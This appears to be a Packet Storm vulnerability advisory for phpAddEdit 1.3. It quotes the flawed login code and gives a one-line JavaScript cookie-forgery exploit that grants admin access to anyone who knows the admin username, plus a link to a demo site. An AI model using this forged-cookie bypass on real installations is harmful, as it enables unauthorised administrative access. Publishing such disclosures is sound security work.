phpAddEdit version 1.3 suffers from a login bypass vulnerability via cookie manipulation.
d0f2e13bebe9707a65373668eb8b9a47de9d4c6c388fa1a26e1e763ad2552ea7-------------------------------------
PhpAddEdit 1.3 Login By Pass
-------------------------------------
Found By: x0r ( Evolution Team )
Email: andry2000@hotmail.it
-------------------------------------
Bug In: Addedit-login.php
if (!$login_error) {
// --- Set admin cookie so favorite form field will show up when I use
the site...
if ($_POST["rememberme"]) {
$expire = mktime(0,0,0,date("m"),date("d")+120,date("Y"));
setcookie("addedit", $_POST["adminuser"], $expire, "/", "", 0);
} else {
setcookie("addedit", $_POST["adminuser"]);
}
Header("Location: ./");
}
}
Ci basta conoscere l'username dell'admin per bypassare il login :P ^ ^
-------------------------------------
Exploit:
javascript:document.cookie = "addedit=[adminuser]; path=/";
es:
javascript:document.cookie = "addedit=x0r; path=/";
--------------------------------------
Live Demo: http://www.phpaddedit.com/demo/
--------------------------------------
Greetz: Amore oggi +65 ti amo troppo.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed